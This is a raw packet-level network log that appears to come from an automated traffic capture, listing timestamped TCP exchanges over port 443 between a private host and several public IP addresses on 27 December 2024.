                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.359064102 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.369784117 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.380736113 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.380898952 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.380963087 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.380971909 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.381119013 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.391067028 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.391218901 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.391335011 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.391343117 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.400943041 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.401027918 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.401038885 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.410609961 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.410707951 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.410725117 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.420093060 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.420258045 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.420269012 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.429843903 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.429970980 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.429981947 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.439644098 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.443245888 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.443253994 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.446757078 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.446825981 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.446837902 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.453917980 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.453983068 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.453989983 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.460956097 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.461045980 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.461056948 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.473817110 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.473923922 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.473933935 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.478508949 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.478569031 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.478575945 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.488360882 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.488428116 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.488435984 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.492049932 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.492176056 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.492182970 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.498471022 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.498544931 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.498553038 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.505285025 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.507067919 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.507080078 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.512898922 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.512990952 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.512999058 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.519364119 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.520544052 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.520551920 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.527148008 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.527226925 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.527234077 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.535912037 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.535991907 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.535999060 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.548530102 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.548749924 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.548757076 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.559971094 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.560044050 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.560051918 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.570930004 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.571006060 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.571013927 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.581895113 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.581954002 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.581962109 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.583092928 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.583161116 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.583168983 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.592052937 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.592164040 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.593187094 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.593337059 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.595951080 CET49734443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.595963955 CET44349734172.217.21.36192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:22.919307947 CET49758443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:22.919352055 CET44349758188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:22.919430971 CET49758443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:22.919867992 CET49758443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:22.919881105 CET44349758188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.079687119 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.079720020 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.080357075 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.086910009 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.086925030 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.096786976 CET49736443192.168.2.5172.217.21.36
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.369870901 CET44349758188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.370184898 CET49758443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.371268988 CET49758443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.371304989 CET44349758188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.374006987 CET49758443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:24.374034882 CET44349758188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.283431053 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.283503056 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.283801079 CET49769443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.283842087 CET4434976923.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.283931017 CET49769443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.284924984 CET49769443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.284936905 CET4434976923.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.402925968 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.402971029 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.428916931 CET44349758188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.428991079 CET44349758188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.429065943 CET49758443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.429065943 CET49758443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.429862022 CET49758443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.429913044 CET44349758188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.574246883 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.574340105 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.574840069 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.574851990 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.576824903 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.576833010 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.576920033 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.576936960 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.576998949 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.576998949 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577004910 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577018023 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577038050 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577052116 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577083111 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577095032 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577136040 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577150106 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577214003 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577224016 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577235937 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577250004 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577265978 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577274084 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577332020 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577343941 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577358961 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577366114 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577380896 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577392101 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577434063 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577440977 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577461958 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577471972 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577482939 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577488899 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577503920 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:25.577507973 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:26.125627041 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:26.125674009 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:26.125734091 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:26.125926018 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:26.125937939 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:26.623603106 CET4434976923.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:26.623670101 CET49769443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.592061996 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.592133045 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.592292070 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.593164921 CET49761443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.593178988 CET44349761188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.619302034 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.619395971 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621351004 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621351004 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621359110 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621373892 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621603966 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621615887 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621633053 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621635914 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621737957 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621754885 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621761084 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621764898 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621824980 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:27.621835947 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:28.220689058 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:28.220745087 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:28.220947981 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:28.221291065 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:28.221307039 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.317823887 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.317987919 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.318032980 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.319168091 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.319168091 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.623593092 CET49770443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.623617887 CET44349770188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.652964115 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.653103113 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.655059099 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.655070066 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.655436993 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.655443907 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.655567884 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.655591965 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.655700922 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.655718088 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.655929089 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.655950069 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.656088114 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.656100035 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.656116962 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.656122923 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.656194925 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:29.656209946 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:30.236110926 CET49782443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:30.236124992 CET44349782188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:30.236202955 CET49782443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:30.236480951 CET49782443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:30.236490011 CET44349782188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.450752020 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.450843096 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.450889111 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.450917006 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.452322960 CET49776443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.452342033 CET44349776188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.678667068 CET44349782188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.678790092 CET49782443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.844325066 CET49782443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.844346046 CET44349782188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.846201897 CET49782443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:31.846208096 CET44349782188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:32.890768051 CET44349782188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:32.890836954 CET49782443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:32.890845060 CET44349782188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:32.891176939 CET49782443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:32.997813940 CET49782443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:32.997838974 CET44349782188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.112420082 CET49809443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.112445116 CET44349809188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.112638950 CET49809443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.115227938 CET49809443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.115240097 CET44349809188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.905848980 CET49816443192.168.2.52.16.158.176
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.905914068 CET443498162.16.158.176192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.905989885 CET49816443192.168.2.52.16.158.176
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.906740904 CET49816443192.168.2.52.16.158.176
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.906761885 CET443498162.16.158.176192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.992607117 CET49817443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.992665052 CET44349817142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.992753983 CET49817443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.993186951 CET49817443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.993202925 CET44349817142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.215512991 CET49819443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.215557098 CET44349819188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.215656042 CET49819443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.215928078 CET49819443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.215945959 CET44349819188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.343466997 CET49820443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.343585014 CET44349820172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.343683958 CET49820443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.343851089 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.343883991 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.343945980 CET49821443192.168.2.5172.64.41.3
